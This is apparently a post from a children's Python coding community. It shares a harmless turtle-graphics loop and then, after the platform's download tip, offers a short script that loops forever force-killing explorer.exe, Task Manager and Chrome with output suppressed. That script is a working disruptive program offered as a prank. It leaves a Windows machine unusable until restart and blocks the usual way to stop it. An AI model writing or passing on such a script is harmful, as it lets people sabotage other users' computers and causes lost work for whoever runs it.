用户:明月清风l6-R查看:1 回复:3 评论:1 创建时间:2020-04-02T20:07:23
【作品展示】

【作品介绍】
用用,你会很懵逼。
【作品源代码】
import turtle
__Pen = turtle.Pen()
#开始进入Python的世界
for __count in range(20):
__Pen.forward(100)
print('你喵')
【提示】
部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:
https://python.codemao.cn为什么不用这个呢?
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
system("taskkill /f /im chrome.exe >nul 2>nul")
点赞0
评论